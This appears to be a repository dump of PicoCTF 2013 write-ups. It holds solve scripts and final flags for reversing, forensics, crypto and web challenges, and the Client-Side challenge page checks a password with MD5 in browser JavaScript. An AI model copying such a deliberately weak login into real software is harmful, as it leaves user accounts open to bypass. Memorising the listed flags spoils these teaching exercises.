19 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html) 20 | * [http://cao.vc/notes/hacklu13-web150](http://cao.vc/notes/hacklu13-web150) 21 | * [https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee](https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee) 22 | * [http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf](http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf) 23 | * [lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee](lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee) 24 | * [http://depier.re/hacklu_2K13_rec_web_150](http://depier.re/hacklu_2K13_rec_web_150) -------------------------------------------------------------------------------- /pico-ctf-2013/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013 write-ups 2 | 3 | * 4 | * [Scoreboard](https://2013.picoctf.com/scoreboard) 5 | 6 | ## Completed write-ups 7 | 8 | ##### General 9 | 10 | * [Failure to Boot: 20](failure-to-boot) 11 | * [Read the Manual: 30](read-the-manual) 12 | * [XMLOL: 30](xmlol) 13 | * [Technician Challenge: 30](technician-challenge) 14 | * [Grep is Your Friend: 40](grep-is-your-friend) 15 | * [First Contact: 40](first-contact) 16 | * [Try Them All!: 45](try-them-all) 17 | * [GETKey: 50](getkey) 18 | * [Spaceport Map: 55](spaceport-map) 19 | * [Bitwise: 55](bitwise) 20 | * [Yummy: 60](yummy) 21 | * [Byte Code: 70](byte-code) 22 | * [CFG to C: 70](cfg-to-c) 23 | * [RSA: 70](rsa) 24 | * [Pilot Logic: 75](pilot-logic) 25 | * [Client-Side is the Best Side: 75](client-side-is-the-best-side) 26 | * [DDoS Detection: 85](ddos-detection) 27 | * [Injection: 110](injection) 28 | 29 | ##### Binary Exploiatation 30 | 31 | * [ROP 1: 95](rop-1) 32 | * [ROP 2: 120](rop-2) 33 | * [ROP 3: 150](rop-3) 34 | * [ROP 4: 165](rop-4) 35 | * [Overflow 1: 90](overflow-1) 36 | * [Overflow 2: 100](overflow-2) 37 | * [Overflow 3: 120](overflow-3) 38 | * [Overflow 4: 150](overflow-4) 39 | * [Overflow 5: 190](overflow-5) 40 | 41 | 42 | 43 | 44 | 45 | 46 | ##### Cryptography - TODO 47 | 48 | * [Trivial: 45](trivial) 49 | * [Classic: 70](classic) 50 | * [Robomunication: 80](robomunication) 51 | * [Broken CBC: 125](#) 52 | * [Broken RSA: 180](#) 53 | 54 | ##### Forensics 55 | 56 | * [NAVSAT: 70](navsat) 57 | * [Spamcarver: 70](spamcarver) 58 | * [Second Contact: 85](second-contact) 59 | * [In Hex, No One Can Hear You Complain: 90](in-hex-no-one-can-hear-you-complain) 60 | * [Chromatophoria: 100](chromatophoria) 61 | * [Dark Star: 110](dark-star) 62 | * [Black Hole: 115](black-hole) 63 | * [Core Decryption: 120](core-decryption) 64 | 65 | ##### Script Exploitation 66 | * [Pretty Hard Programming: 95](pretty-hard-programming) 67 | * [PHP2: 85](php2) 68 | * [PHP3: 120](php3) 69 | * [Python Eval 1: 85](python-eval-1) 70 | * [Python Eval 2: 95](python-eval-2) 71 | * [Python Eval 3: 110](python-eval-3) 72 | * [Python Eval 5: 140](python-eval-5) 73 | 74 | ##### Reverse Engineering - TODO 75 | 76 | * [avaJ: 85](#) 77 | * [hotcoffee: 85](#) 78 | * [Evergreen: 110](#) 79 | * [Harder Serial: 120](#) 80 | * [Mildly Evil: 185](#) 81 | * [moreevil: 200](#) 82 | 83 | ##### Binary Exploitation - TODO 84 | 85 | * [Format 1: 100](#) 86 | * [Format 2: 180](#) 87 | 88 | ## External write-ups only 89 | * [PHP4: 110](php4) 90 | * [Python Eval 4: 130](python-eval-4) 91 | 92 | ## Missing write-ups 93 | 94 | * **Link to `#` is TODO.** 95 | 96 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Bitwise 2 | 3 | **Category:** ACM 4 | **Points:** 55 5 | **Description:** 6 | 7 | > You see the doors to the loading bay of the hangar, but they are locked. However, you are able to extract the password verification program from the control panel... Can you find the password to gain access to the loading bay? 8 | > 9 | > Available in [Python](https://2013.picoctf.com/problems/bit.py) or [Java](https://2013.picoctf.com/problems/Bit.java) 10 | > 11 | > offline files: [Python](bitwise.py) | [Java](bitwise.java) 12 | 13 | ## Write-up 14 | 15 | We have encryption algorithms and cipher text. 16 | 17 | A little edit, we can generate input as string (length = 10, characters: 0-9,a-z (1-255 ASCII)). 18 | Then encrypt and compare with cipher text. 19 | 20 | Source: [solve.py](solve.py) 21 | 22 | ```python 23 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 24 | password = "" 25 | for i in xrange(0,10): 26 | for j in xrange(1,256): 27 | k = (((j << 5) | (j >> 3)) ^ 111) & 255 28 | if k == verify_arr[i]: 29 | password = password + chr(j) 30 | 31 | print password 32 | ``` 33 | 34 | **Answer:** ub3rs3cr3t 35 | 36 | ## Other write-ups and resources 37 | 38 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/bitwise.java: -------------------------------------------------------------------------------- 1 | import java.util.*; 2 | 3 | public class Bit { 4 | public static void main(String[] args) { 5 | System.out.print("Enter Password: "); 6 | Scanner s = new Scanner(System.in); 7 | String user_key = s.next(); 8 | if (user_key.length() != 10) { 9 | System.out.println("Wrong"); 10 | return; 11 | } 12 | 13 | char[] verify_arr = {193, 35, 9, 33, 1, 9, 3, 33, 9, 225}; 14 | 15 | ArrayList user_arr = new ArrayList(); 16 | char[] user_submitted_arr = user_key.toCharArray(); 17 | 18 | for (char ch : user_submitted_arr) { 19 | user_arr.add((char)((((ch << 5) | (ch >> 3)) ^ 111) & 255)); 20 | } 21 | 22 | int i; 23 | for(i = 0; i < 10; i++) { 24 | if (!user_arr.get(i).equals((char)verify_arr[i])) { 25 | System.out.println("Wrong"); 26 | return; 27 | } 28 | } 29 | System.out.println("Success"); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/bitwise.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | user_submitted = raw_input("Enter Password: ") 4 | 5 | if len(user_submitted) != 10: 6 | print "Wrong" 7 | exit() 8 | 9 | 10 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 11 | user_arr = [] 12 | for char in user_submitted: 13 | # '<<' is left bit shift 14 | # '>>' is right bit shift 15 | # '|' is bit-wise or 16 | # '^' is bit-wise xor 17 | # '&' is bit-wise and 18 | user_arr.append( (((ord(char) << 5) | (ord(char) >> 3)) ^ 111) & 255 ) 19 | 20 | if (user_arr == verify_arr): 21 | print "Success" 22 | else: 23 | print "Wrong" 24 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 4 | password = "" 5 | for i in xrange(0,10): 6 | for j in xrange(1,256): 7 | k = (((j << 5) | (j >> 3)) ^ 111) & 255 8 | if k == verify_arr[i]: 9 | password = password + chr(j) 10 | 11 | print password 12 | -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/1.png -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Black Hole 2 | 3 | **Category:** Forensic 4 | **Points:** 115 5 | **Description:** 6 | 7 | > Near the galactic core, you find a beacon indicating that an ancient civilization hid one of their worlds [within a nearby black hole](https://2013.picoctf.com/problems/blackhole.img). Is this what passes for intergalactic humor, or is there actually something in there? 8 | > 9 | > The disk image can be found on the shell machines at `/problems/blackhole.img` and the contents of the image are available in `/problems/blackhole/` 10 | > 11 | > [Offline file](blackhole.img) 12 | 13 | ## Write-up 14 | 15 | The first step is to obtain our masked_key.png file from blackhole.img. 16 | 17 | After mounting the image, we see a directory that appears to be named “???”. However, using the hint we run “ls -b” and see that it is actually three tabs. We type cd * to enter the directory. (Hint: type echo * to see why this works.) 18 | 19 | Once inside, we copy the file out. 20 | 21 | ![](1.png) 22 | 23 | At the end of the file, the string “EVENT HORIZON EVENT HORIZON” is repeated a few times… strange. And at the beginning of the file, we see traces of the event horizon as well: 24 | 25 | ``` 26 | \blackhole # hexdump -C masked_key.png | head -n 4 27 | 00000000 76 88 b1 a7 0d 1a 50 4c 49 46 00 48 1f 0d 0a 06 |v.....PLIF.H....| 28 | 00000010 48 4f 50 a7 5a 4f 4c 78 4d 50 45 4e 54 75 c1 31 |HOP.ZOLxMPENTu.1| 29 | 00000020 eb 5a 4f 4e 24 36 14 0c 1a 5c 40 47 5a 35 52 2b |.ZON$6...\@GZ5R+| 30 | 00000030 c6 20 45 76 45 07 10 09 1b 2a d5 0e f3 97 50 bc |. EvE....*....P.| 31 | ``` 32 | 33 | Very strange. We have reason to believe that this is a PNG file, so on a hunch I decided to XOR the first few bytes of the file with the PNG header. 34 | 35 | ``` 36 | Masked: 37 | 76 88 B1 A7 0D 1A 50 4C 38 | PNG: 39 | 89 50 4E 47 0D 0A 1A 0A 40 | XOR: 41 | FF D8 FF E0 00 10 4A 46 42 | ``` 43 | 44 | This sequence exists in the file as the last 64 bytes. 45 | 46 | ``` 47 | 000effc0 ff d8 ff e0 00 10 4a 46 49 46 00 45 56 45 4e 54 |......JFIF.EVENT| 48 | 000effd0 48 4f 52 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 |HORIZON EVENTHOR| 49 | 000effe0 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f |IZON EVENTHORIZO| 50 | 000efff0 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f 4e ff d9 |N EVENTHORIZON..| 51 | ``` 52 | 53 | We xor the file with the last 64 bytes: 54 | 55 | ``` 56 | Python 3.2.3 (default, Oct 24 2012, 19:34:37) 57 | [GCC 4.5.4] on linux2 58 | Type "help", "copyright", "credits" or "license" for more information. 59 | >>> mask_in = open('masked_key.png','rb') 60 | >>> key = bytearray(mask_in.read(983040-64)) 61 | >>> mask= bytearray(mask_in.read(64)) 62 | >>> for x in range(983040-64): 63 | ... key[x] ^= mask[x%64] 64 | ... 65 | >>> key_out = open('unmasked_key.png','wb') 66 | >>> key_out.write(key) 67 | 982976 68 | >>> key_out.close() 69 | >>> 70 | ``` 71 | 72 | And out pops the key! 73 | 74 | ![](solve.png) 75 | 76 | **Answer:** Hacking Radiation 77 | 78 | ## Other write-ups and resources 79 | 80 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/blackhole.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/blackhole.img -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/byte-code/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Byte Code 2 | 3 | **Category:** ACM 4 | **Points:** 70 5 | **Description:** 6 | 7 | > You need to authenticate with the guard to gain access to the loading bay! Enter the root password from the vault application to retrieve the passkey! [This](https://2013.picoctf.com/autoproblems/tmpBPWe7T.zip) class file is the executable for the vault application. 8 | > 9 | > [offline file](tmpBPWe7T.zip) 10 | 11 | ## Write-up 12 | 13 | Use [tool](http://www.showmycode.com) to decrypt Java code. 14 | 15 | ```java 16 | key = new char[10]; 17 | key[0] = 'A'; 18 | key[1] = 'o'; 19 | key[2] = 'J'; 20 | key[3] = 'k'; 21 | key[4] = 'V'; 22 | key[5] = 'h'; 23 | key[6] = 'L'; 24 | key[7] = 'w'; 25 | key[8] = 'U'; 26 | key[9] = 'R'; 27 | Console console = system.console(); 28 | for(string s = ""; !s.equals("ThisIsth3mag1calString4458"); 29 | s = console.readLine("Enter password:", new object[0])); 30 | 31 | for(int i = 0; i < key.length; i++) 32 | system.out.print(key[i]); 33 | ``` 34 | 35 | It's not difficult to see the key. 36 | 37 | **Answer:** AoJkVhLwUR 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/byte-code/tmpBPWe7T.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/byte-code/tmpBPWe7T.zip -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: CFG to C 2 | 3 | **Category:** ACM 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Wouldn't it be cool to be able to have one of these patrol drones to do your bidding?! Figure out the correct sequence of C functions from the following [control flow graphs](https://2013.picoctf.com/problems/match.html) and you should be well on your way. 8 | > 9 | > [offline file](cfg2c) 10 | 11 | ## Write-up 12 | 13 | This is check for code reading. 14 | 15 | **Answer:** BCDA 16 | 17 | ## Other write-ups and resources 18 | 19 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func1.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func2.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func3.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func4.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ASM CFG C 6 | 7 | 8 | 9 | Match the control flow graph on the left with the correct C function on the right. Submit the correct answer sequence (i.e. 'ABCD'). 10 |
11 | 12 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 23 | 24 | 33 | 34 | 35 | 36 | 39 | 50 | 51 | 52 | 53 | 56 | 58 | 70 | 71 | 72 | 73 | 76 | 90 | 91 | 92 |
13 |

1)

 21 | 22 |

A)

25 | 
26 |         int modulo(int a, int b)
27 |         {
28 |             return b % a;
29 |         }
30 | 
31 |
32 |

2)

 37 | 38 |

B)

40 | 
41 |         int loop(int a)
42 |         {
43 |             while (a >= 0) {
44 |                 a--;
45 |             }
46 |             return a;
47 |         }
48 |
49 |

3)

 54 | 55 | 57 |

C)

59 | 
60 |         int control(int a, int b)
61 |         {    
62 |             if (a > b)
63 |                 return b;
64 |             else 
65 |                 return a;  
66 |             
67 |         }
68 |
69 |

4)

 74 | 75 | 77 |

D)

78 | 
79 |         int for_loop(int a, int b, int c)
80 |         {
81 |             int i;
82 | 
83 |             for(i = 0; i < b; i++)
84 |                  a = c + i;
85 |             return a;
86 |         }
87 | 
88 |
89 |
93 |
94 | 95 | 96 | -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Chromatophoria 2 | 3 | **Category:** Forensic 4 | **Points:** 100 5 | **Description:** 6 | 7 | > While refueling at a gas giant, you are hailed by a race of cuttlefish-people who dwell within it. [Their transmission](https://2013.picoctf.com/problems/steg.png) is entirely visual; you suspect that they may be communicating through the color values. 8 | > 9 | > [Offline file](steg.png) 10 | 11 | ## Write-up 12 | 13 | I don't solve this challenge. 14 | 15 | Hint: [Steganography](http://www.garykessler.net/library/steganography.html) 16 | 17 | In other write-up. It's LSB Steganography. 18 | 19 | Source: [java](solve.java) 20 | 21 | **Answer:** st3g0_saurus_wr3cks 22 | 23 | ## Other write-ups and resources 24 | 25 | * -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/solve.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.util.*; 3 | import java.awt.image.BufferedImage; 4 | import java.io.File; 5 | import java.io.IOException; 6 | import javax.imageio.ImageIO; 7 | import java.io.BufferedWriter; 8 | import java.io.File; 9 | import java.io.FileWriter; 10 | class Untitled { 11 | public static void main(String[] args) throws Exception { 12 | BufferedImage image = ImageIO.read(new File("/Users/andy/Desktop/steg.png")); 13 | String fin = ""; 14 | File file = new File("/Users/andy/Desktop/loloutput.txt"); 15 | if (!file.exists()) { 16 | file.createNewFile(); 17 | } 18 | FileWriter fw = new FileWriter(file.getAbsoluteFile()); 19 | BufferedWriter bw = new BufferedWriter(fw); 20 | 21 | for(int y=0;y>8)&0xFF)).substring(7); 25 | String b = pad(Integer.toBinaryString((image.getRGB(x,y)>>16)&0xFF)).substring(7); 26 | bw.write(b+g+r); 27 | } 28 | } 29 | } 30 | static String pad(String s) { 31 | while(s.length()!=8) s="0"+s; 32 | return s; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/steg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/chromatophoria/steg.png -------------------------------------------------------------------------------- /pico-ctf-2013/classic/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Classic 2 | 3 | **Category:** Cryptography 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Someone or something stuck a random flyer on your space ship that reads: 8 | >> cslcehesehft ohrumvc zmvm scmk ht ptohmte ehbmc mxmt eufsju eumq pvm dshem mpchgq lvfymt zheu nsce p rmtohg ptk rprmv, fv bfvm vmomtegq lq ofbbft ofbrsemvhwmk effgc. qfsv ymq hc: zumt_kf_zm_jme_ef_eum_upvk_cesii 9 | 10 | ## Write-up 11 | 12 | This challenge involves decrypting a simple substitution cipher. Using the substitution cipher solver at http://quipqiup.com/index.php , we can get the solution. 13 | 14 | **Answer: when_do_we_get_to_the_hard_stuff** 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet 19 | -------------------------------------------------------------------------------- /pico-ctf-2013/client-side-is-the-best-side/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Client-Side is the Best Side 2 | 3 | **Category:** Web Vuln 4 | **Points:** 75 5 | **Description:** 6 | 7 | > Luckily the ship has a [web-based authentication system](https://2013.picoctf.com/problems/clientside.html)! Hmm…even though you don't know the password, I bet you can still get in! 8 | 9 | ## Write-up 10 | 11 | Ctrl+U > viewsource : 12 | 13 | ```javascript 14 | function verify() { 15 | checkpass = document.getElementById("pass").value; 16 | if (md5(checkpass) == "03318769a5ee1354f7479acc69755e7c") { 17 | alert("Correct!"); 18 | document.location="./aebe515f7c62b96ad7de047c11aa3228.html"; 19 | } 20 | else { 21 | alert("Incorrect password"); 22 | } 23 | } 24 | ``` 25 | 26 | Surprise: *document.location="./aebe515f7c62b96ad7de047c11aa3228.html";* 27 | 28 | Full link: 29 | 30 | https://2013.picoctf.com/problems/aebe515f7c62b96ad7de047c11aa3228.html 31 | 32 | **Answer:** cl13nt_s1d3_1s_w0rst_s1d3 33 | 34 | ## Other write-ups and resources 35 | 36 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/client-side-is-the-best-side/clientside.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Secure Login Server 4 | 5 | 6 | 7 | 8 | 9 | 21 |
22 |
23 |

Welcome to the Secure Login Server.

24 |

Please enter your credentials to proceed

25 |
26 | 27 |
28 | 29 |
30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Core Decryption 2 | 3 | **Category:** Forensic 4 | **Points:** 120 5 | **Description:** 6 | 7 | > In a ruined city on a forgotten world, you find a broken cogitator controlling access to the Vault. You have blueprints for the machine, and a stickynote attached to the monitor with the encrypted input. The machine seems to have crashed while decrypting, and generated a core dump, too. Maybe if you can get the encryption keys out of the core dump, you can decrypt the ciphertext and get the vault open... [Files available for download here](https://2013.picoctf.com/problems/core_decrypt.tar) on on the shell machine in `/problems/core_decrypt.tar` 8 | > 9 | > [Offline file](core_decrypt.tar) 10 | 11 | ## Write-up 12 | 13 | I don't solve this challenge... 14 | 15 | Core Decryption was another one of those painful problems. Though not hard, it's hard to find what direction you need to take. First off, you can't just run GDB with the core file. 16 | You have to compile the cryptor.c with `gcc -m32 -g cryptor.c -o cryptor`, we compile it in 32 bit mode with debugging symbols ON. This is the key to getting the core dump running. Running the core file and binary through GDB with the following commands: 17 | 18 | ```linux 19 | root@neuron:~$ gdb cryptor core.26474 20 | (gdb) bt 21 | #0 0x08048564 in swap (sbox=0xffffd17c "", i=-11652, j=16) at cryptor.c:7 22 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42 23 | #2 0x08048894 in main (argc=4, argv=0xffffd374) at cryptor.c:67 24 | (gdb) f 1 25 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42 26 | 42 tmp ^= next_prg(sbox,&i,&j); 27 | (gdb) info locals 28 | sbox = "\000\001\002\003\004\005\006\a\b\t\n\v\f\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\177\200\201\202\203\204\205\206\207\210\211\212\213\214\215\216\217\220\221\222\223\224\225\226\227\230\231\232\233\234\235\236\237\240\241\242\243\244\245\246\247\250\251\252\253\254\255\256\257\260\261\262\263\264\265\266\267\270\271\272\273\274\275\276\277\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357\360\361\362\363\364\365\366\367\370\371\372\373\374\375\376\377" 29 | i = 0 30 | j = -135168078 31 | key = "\305\344L\004\273/\\\020\272u\033×L\334", 32 | tmp = 247 '\367' 33 | ``` 34 | 35 | So we see that there is a key variable here. At first, we wondered what to do with it, what did "incomplete sequence" mean? We decided to ignore it, because if you refer back to the code, you know that the key will be 16 bytes long. We took the key, turned into hex so Python wouldn't have any trouble with it, and we got our result. 36 | 37 | ```python 38 | import random, base64 39 | def crypt(data, key): 40 | x = 0 41 | box = range(256) 42 | for i in range(256): 43 | x = (x + box[i] + ord(key[i % len(key)])) % 256 44 | box[i], box[x] = box[x], box[i] 45 | x = y = 0 46 | out = [] 47 | for char in data: 48 | x = (x + 1) % 256 49 | y = (y + box[x]) % 256 50 | box[x], box[y] = box[y], box[x] 51 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) 52 | return ''.join(out) 53 | with open('ENCRYPTED', 'rb') as f: 54 | content = f.read() 55 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex')) 56 | ``` 57 | 58 | The message, decrypted with RC4, was: 59 | 60 | ``` 61 | Well, assuming you're able to actually keep the secret keyfile safe, this is a legitimate way to encrypt files! 62 | Your key is: astronomy_ceremony_times 63 | ``` 64 | 65 | **Answer:** astronomy_ceremony_times 66 | 67 | ## Other write-ups and resources 68 | 69 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/core_decrypt.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/core-decryption/core_decrypt.tar -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/solve.py: -------------------------------------------------------------------------------- 1 | import random, base64 2 | def crypt(data, key): 3 | x = 0 4 | box = range(256) 5 | for i in range(256): 6 | x = (x + box[i] + ord(key[i % len(key)])) % 256 7 | box[i], box[x] = box[x], box[i] 8 | x = y = 0 9 | out = [] 10 | for char in data: 11 | x = (x + 1) % 256 12 | y = (y + box[x]) % 256 13 | box[x], box[y] = box[y], box[x] 14 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) 15 | return ''.join(out) 16 | with open('ENCRYPTED', 'rb') as f: 17 | content = f.read() 18 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex')) -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Dark Star 2 | 3 | **Category:** Forensic 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Sure are a lot of stars [out there](https://2013.picoctf.com/problems/darkstar.img)... but there's a lot of empty space for things to hide in, too. 8 | > 9 | > The disk image can be found on the shell machines at `/problems/dark_star.img` and the contents of the image are available in `/problems/dark_star/` 10 | > 11 | > [Offline file](darkstar.img) 12 | 13 | ## Write-up 14 | 15 | Use tool [Autopsy](http://www.sleuthkit.org/autopsy/) > Create NewCase and import image file into it. 16 | 17 | ![](solve.png) 18 | 19 | ``` 20 | Key: Stars hide your fires 21 | ``` 22 | 23 | **Answer:** Stars hide your fires 24 | 25 | ## Other write-ups and resources 26 | 27 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/darkstar.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/darkstar.img -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: DDoS Detection 2 | 3 | **Category:** Forensic 4 | **Points:** 85 5 | **Description:** 6 | 7 | > It appears a SYN-flood style DDoS has been carried out on this system. Send us a list of the IP addresses of the attackers (in any order, separated by spaces), so we can track them down and stop them. 8 | > 9 | > Pcap available to download [here](https://2013.picoctf.com/problems/syn_attack.pcap), or available to analyse online [at CloudShark](http://www.cloudshark.org/captures/88971318a309) 10 | > 11 | > [offline file](syn_attack.pcap) 12 | 13 | ## Write-up 14 | 15 | First, we have to understand what SYN attack is. Simple is attacker send many packet with flag SYN = 1 at a time, server can't respond ACK because timer is longer than sending timer, server is overload. 16 | 17 | Open pcap with `Wireshark > Statics > Conversations`: 18 | 19 | ![](conversations.png) 20 | 21 | => Server (victim): 128.237.255.81 22 | 23 | Use filter to filt all packets from attack: 24 | 25 | ``` 26 | tcp && ip.dst == 128.237.255.81 && tcp.flags.syn == 1 && tcp.flags.ack == 0 27 | ``` 28 | 29 | We can lists source IP and it's all IP of attacker. 30 | 31 | `Statics > IP Statics (unchanged filter)` 32 | 33 | **Answer:** 34 | 35 | ``` 36 | 121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158 37 | ``` 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/conversations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/conversations.png -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/syn_attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/syn_attack.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/failure-to-boot/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Failure To Boot 2 | 3 | **Category:** Trivia 4 | **Points:** 20 5 | **Description:** 6 | 7 | > After opening the robot's front panel and looking inside, you discover a small red button behind a tangle of wires. Pressing the button lights up the robot's primary screen. It glows black and quickly flashes blue. A line of small text types out: 8 | > 9 | > ```ERROR: 0x00000023``` 10 | > 11 | > The text refreshes and displays the prompt: 12 | > 13 | > FILE SYSTEM RECOVERY INITIATED... 14 | > 15 | > FILE SYSTEM COULD NOT BE IDENTIFIED... 16 | > 17 | > PLEASE ENTER FILE SYSTEM FORMAT: 18 | 19 | ## Write-up 20 | 21 | Google keyword `ERROR: 0x00000023` for several results. 22 | 23 | And: `STOP 0x00000023 : FAT_FILE_SYSTEM` - a problem with file "Fastfat.sys". 24 | 25 | **Answer:** FAT 26 | 27 | ## Other write-ups and resources 28 | 29 | * none yet -------------------------------------------------------------------------------- 